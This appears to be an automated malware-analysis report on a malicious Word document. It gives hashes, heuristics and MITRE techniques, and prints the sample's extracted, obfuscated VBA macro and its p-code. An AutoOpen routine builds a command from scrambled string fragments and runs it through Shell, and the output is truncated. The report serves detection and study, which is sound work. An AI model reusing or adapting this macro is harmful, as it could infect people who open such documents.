Office (OLE) malware analysis — malicious · 73831bb22036d4af

MALICIOUS

Office (OLE)

107.9 KB Created: 2018-08-10 18:55:00 Authoring application: Microsoft Office Word First seen: 2019-05-31

MD5: 7b385ee8a38daa4bc7a54ba7d0552087 SHA-1: f8b6921009defd04aad4239380c88e5a8c847e92 SHA-256: 73831bb22036d4af4c96aaf40090a687da62a2d214548946c5ad8574649ec4b4

82 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is designed to execute an arbitrary command using the Shell function, likely to download and run a second-stage payload. The obfuscated nature of the script prevents a more detailed analysis of its exact function.

Heuristics 4

VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 42864 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	42864 bytes
SHA-256: `9a854b7de1e584a15ca15940fe5bc9235d814029df9269225ab87157566b8405`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "VXzoOtZVpkqYRd" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next TypeName Sgn(211519271) TypeName 95 TypeName dwcBFA TypeName Atn(PRhtji - pzwJz * 87460 - zFlLNk) TypeName PrhbH Shell@ KeyString(vbKeyC) + JQjiYpwTYJh + wADEWZn + qkocjRXozk + SrLJcKU + jqfOKroKkj + UVMStnSwnuS + cXoQHhaw + XfuLUTYcN + qjOpKzfk + khOUbITmDB + SwAEVG + hNfIrziVNvNEYQ + SRmwQuwFmolR, 748164825 - 748164825 TypeName Oct(7415 + wBbjOc) TypeName Hex(820) End Sub ' Processing file: /opt/analyzer/scan_staging/3e682616ca0c47748e5fcceb6a8b4baa.bin ' =============================================================================== ' Module streams: ' Macros/VBA/VXzoOtZVpkqYRd - 1982 bytes ' Line #0: ' FuncDefn (Sub AutoOpen()) ' Line #1: ' OnError (Resume Next) ' Line #2: ' LitDI4 0x8727 0x0C9B ' FnSgn ' ArgsCall TypeName 0x0001 ' Line #3: ' LitDI2 0x005F ' ArgsCall TypeName 0x0001 ' Line #4: ' Ld dwcBFA ' ArgsCall TypeName 0x0001 ' Line #5: ' Ld PRhtji ' Ld pzwJz ' LitDI4 0x55A4 0x0001 ' Mul ' Sub ' Ld zFlLNk ' Sub ' ArgsLd Atn 0x0001 ' ArgsCall TypeName 0x0001 ' Line #6: ' Ld PrhbH ' ArgsCall TypeName 0x0001 ' Line #7: ' Ld vbKeyC ' ArgsLd KeyString 0x0001 ' Ld JQjiYpwTYJh ' Add ' Ld wADEWZn ' Add ' Ld qkocjRXozk ' Add ' Ld SrLJcKU ' Add ' Ld jqfOKroKkj ' Add ' Ld UVMStnSwnuS ' Add ' Ld cXoQHhaw ' Add ' Ld XfuLUTYcN ' Add ' Ld qjOpKzfk ' Add ' Ld khOUbITmDB ' Add ' Ld SwAEVG ' Add ' Ld hNfIrziVNvNEYQ ' Add ' Ld SRmwQuwFmolR ' Add ' LitDI4 0x16D9 0x2C98 ' LitDI4 0x16D9 0x2C98 ' Sub ' ArgsCall Shell@ 0x0002 ' Line #8: ' LitDI2 0x1CF7 ' Ld wBbjOc ' Add ' ArgsLd Oct 0x0001 ' ArgsCall TypeName 0x0001 ' Line #9: ' LitDI2 0x0334 ' ArgsLd Hex 0x0001 ' ArgsCall TypeName 0x0001 ' Line #10: ' EndSub ' Line #11: ' Macros/VBA/HqzoUYE - 22104 bytes ' Line #0: ' FuncDefn (Function qkocjRXozk()) ' Line #1: ' OnError (Resume Next) ' Line #2: ' LitDI2 0x0008 ' ArgsCall TypeName 0x0001 ' Line #3: ' LitDI2 0x0005 ' ArgsCall TypeName 0x0001 ' Line #4: ' Ld uUwTP ' Ld BCNfj ' Div ' Ld IjllC ' Ld Jtdss ' Mul ' Add ' Coerce (Bool) ' ArgsCall TypeName 0x0001 ' Line #5: ' LitStr 0x0002 "md" ' LitStr 0x0002 " /" ' Add ' LitStr 0x0001 "V" ' Add ' LitStr 0x0001 ":" ' Add ' LitStr 0x0002 "ON" ' Add ' LitStr 0x0001 "/" ' Add ' LitStr 0x0001 "C" ' Add ' Ld HkvQaIqZq ' Ld jJuaHnM ' Add ' LitDI2 0x0022 ' Add ' Ld OkbwZzio ' Add ' Ld optdlER ' Add ' ArgsLd Chr 0x0001 ' Coerce (Str) ' Add ' LitStr 0x0001 "s" ' Add ' St pMjuPE ' Line #6: ' LitDI2 0x03B8 ' ArgsCall TypeName 0x0001 ' Line #7: ' LitDI4 0xD4E5 0x0A95 ' ArgsCall TypeName 0x0001 ' Line #8: ' LitStr 0x0001 "e" ' LitStr 0x0003 "t #" ' Add ' LitStr 0x0001 " " ' Add ' LitStr 0x0003 " =" ' Add ' LitStr 0x0003 "wjt" ' Add ' LitStr 0x0001 "h" ' Add ' LitStr 0x0003 "MMi" ' Add ' LitStr 0x0001 "M" ' Add ' St iDYaVqOhNV ' Line #9: ' LitDI4 0x8E5E 0x06DF ' ArgsLd Sqr 0x0001 ' ArgsCall TypeName 0x0001 ' Line #10: ' Ld ciqCu ' ArgsLd Sqr 0x0001 ' ArgsCall TypeName 0x0001 ' Line #11: ' LitStr 0x0002 "Ur" ' LitStr 0x0001 "v" ' Add ' LitStr 0x0003 "GUs" ' Add ' LitStr 0x0003 "Cvw" ' Add ' LitStr 0x0002 "HW" ' Add ' LitStr 0x0003 "NTV" ' Add ' LitStr 0x0001 "r" ' Add ' LitStr 0x0002 "p=" ' Add ' LitStr 0x0001 "/" ' Add ' LitStr 0x0002 "xo" ' Add ' LitStr 0x0003 "au-" ' Add ' LitStr 0x0001 "b" ' Add ' St jtChbj ' Line #12: ' Ld TFrDZY ' ArgsCall TypeName 0x0001 ' Line #13: ' LitDI2 0x086D ' ArgsLd Log 0x0001 ' ArgsCall TypeName 0x0001 ' Line #14: ' LitDI2 0x0048 ' ArgsCall TypeName 0x0001 ' Line #15: ' LitStr 0x0003 "lS9" ' LitStr 0x0003 "P:)" ' Add ' LitStr 0x000 ... (truncated)

SHA-256: 9a854b7de1e584a15ca15940fe5bc9235d814029df9269225ab87157566b8405

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "VXzoOtZVpkqYRd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   TypeName Sgn(211519271)
   TypeName 95
   TypeName dwcBFA
   TypeName Atn(PRhtji - pzwJz * 87460 - zFlLNk)
   TypeName PrhbH
Shell@ KeyString(vbKeyC) + JQjiYpwTYJh + wADEWZn + qkocjRXozk + SrLJcKU + jqfOKroKkj + UVMStnSwnuS + cXoQHhaw + XfuLUTYcN + qjOpKzfk + khOUbITmDB + SwAEVG + hNfIrziVNvNEYQ + SRmwQuwFmolR, 748164825 - 748164825
   TypeName Oct(7415 + wBbjOc)
   TypeName Hex(820)
End Sub


' Processing file: /opt/analyzer/scan_staging/3e682616ca0c47748e5fcceb6a8b4baa.bin
' ===============================================================================
' Module streams:
' Macros/VBA/VXzoOtZVpkqYRd - 1982 bytes
' Line #0:
' 	FuncDefn (Sub AutoOpen())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	LitDI4 0x8727 0x0C9B 
' 	FnSgn 
' 	ArgsCall TypeName 0x0001 
' Line #3:
' 	LitDI2 0x005F 
' 	ArgsCall TypeName 0x0001 
' Line #4:
' 	Ld dwcBFA 
' 	ArgsCall TypeName 0x0001 
' Line #5:
' 	Ld PRhtji 
' 	Ld pzwJz 
' 	LitDI4 0x55A4 0x0001 
' 	Mul 
' 	Sub 
' 	Ld zFlLNk 
' 	Sub 
' 	ArgsLd Atn 0x0001 
' 	ArgsCall TypeName 0x0001 
' Line #6:
' 	Ld PrhbH 
' 	ArgsCall TypeName 0x0001 
' Line #7:
' 	Ld vbKeyC 
' 	ArgsLd KeyString 0x0001 
' 	Ld JQjiYpwTYJh 
' 	Add 
' 	Ld wADEWZn 
' 	Add 
' 	Ld qkocjRXozk 
' 	Add 
' 	Ld SrLJcKU 
' 	Add 
' 	Ld jqfOKroKkj 
' 	Add 
' 	Ld UVMStnSwnuS 
' 	Add 
' 	Ld cXoQHhaw 
' 	Add 
' 	Ld XfuLUTYcN 
' 	Add 
' 	Ld qjOpKzfk 
' 	Add 
' 	Ld khOUbITmDB 
' 	Add 
' 	Ld SwAEVG 
' 	Add 
' 	Ld hNfIrziVNvNEYQ 
' 	Add 
' 	Ld SRmwQuwFmolR 
' 	Add 
' 	LitDI4 0x16D9 0x2C98 
' 	LitDI4 0x16D9 0x2C98 
' 	Sub 
' 	ArgsCall Shell@ 0x0002 
' Line #8:
' 	LitDI2 0x1CF7 
' 	Ld wBbjOc 
' 	Add 
' 	ArgsLd Oct 0x0001 
' 	ArgsCall TypeName 0x0001 
' Line #9:
' 	LitDI2 0x0334 
' 	ArgsLd Hex 0x0001 
' 	ArgsCall TypeName 0x0001 
' Line #10:
' 	EndSub 
' Line #11:
' Macros/VBA/HqzoUYE - 22104 bytes
' Line #0:
' 	FuncDefn (Function qkocjRXozk())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	LitDI2 0x0008 
' 	ArgsCall TypeName 0x0001 
' Line #3:
' 	LitDI2 0x0005 
' 	ArgsCall TypeName 0x0001 
' Line #4:
' 	Ld uUwTP 
' 	Ld BCNfj 
' 	Div 
' 	Ld IjllC 
' 	Ld Jtdss 
' 	Mul 
' 	Add 
' 	Coerce (Bool) 
' 	ArgsCall TypeName 0x0001 
' Line #5:
' 	LitStr 0x0002 "md"
' 	LitStr 0x0002 " /"
' 	Add 
' 	LitStr 0x0001 "V"
' 	Add 
' 	LitStr 0x0001 ":"
' 	Add 
' 	LitStr 0x0002 "ON"
' 	Add 
' 	LitStr 0x0001 "/"
' 	Add 
' 	LitStr 0x0001 "C"
' 	Add 
' 	Ld HkvQaIqZq 
' 	Ld jJuaHnM 
' 	Add 
' 	LitDI2 0x0022 
' 	Add 
' 	Ld OkbwZzio 
' 	Add 
' 	Ld optdlER 
' 	Add 
' 	ArgsLd Chr 0x0001 
' 	Coerce (Str) 
' 	Add 
' 	LitStr 0x0001 "s"
' 	Add 
' 	St pMjuPE 
' Line #6:
' 	LitDI2 0x03B8 
' 	ArgsCall TypeName 0x0001 
' Line #7:
' 	LitDI4 0xD4E5 0x0A95 
' 	ArgsCall TypeName 0x0001 
' Line #8:
' 	LitStr 0x0001 "e"
' 	LitStr 0x0003 "t #"
' 	Add 
' 	LitStr 0x0001 " "
' 	Add 
' 	LitStr 0x0003 "  ="
' 	Add 
' 	LitStr 0x0003 "wjt"
' 	Add 
' 	LitStr 0x0001 "h"
' 	Add 
' 	LitStr 0x0003 "MMi"
' 	Add 
' 	LitStr 0x0001 "M"
' 	Add 
' 	St iDYaVqOhNV 
' Line #9:
' 	LitDI4 0x8E5E 0x06DF 
' 	ArgsLd Sqr 0x0001 
' 	ArgsCall TypeName 0x0001 
' Line #10:
' 	Ld ciqCu 
' 	ArgsLd Sqr 0x0001 
' 	ArgsCall TypeName 0x0001 
' Line #11:
' 	LitStr 0x0002 "Ur"
' 	LitStr 0x0001 "v"
' 	Add 
' 	LitStr 0x0003 "GUs"
' 	Add 
' 	LitStr 0x0003 "Cvw"
' 	Add 
' 	LitStr 0x0002 "HW"
' 	Add 
' 	LitStr 0x0003 "NTV"
' 	Add 
' 	LitStr 0x0001 "r"
' 	Add 
' 	LitStr 0x0002 "p="
' 	Add 
' 	LitStr 0x0001 "/"
' 	Add 
' 	LitStr 0x0002 "xo"
' 	Add 
' 	LitStr 0x0003 "au-"
' 	Add 
' 	LitStr 0x0001 "b"
' 	Add 
' 	St jtChbj 
' Line #12:
' 	Ld TFrDZY 
' 	ArgsCall TypeName 0x0001 
' Line #13:
' 	LitDI2 0x086D 
' 	ArgsLd Log 0x0001 
' 	ArgsCall TypeName 0x0001 
' Line #14:
' 	LitDI2 0x0048 
' 	ArgsCall TypeName 0x0001 
' Line #15:
' 	LitStr 0x0003 "lS9"
' 	LitStr 0x0003 "P:)"
' 	Add 
' 	LitStr 0x000
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.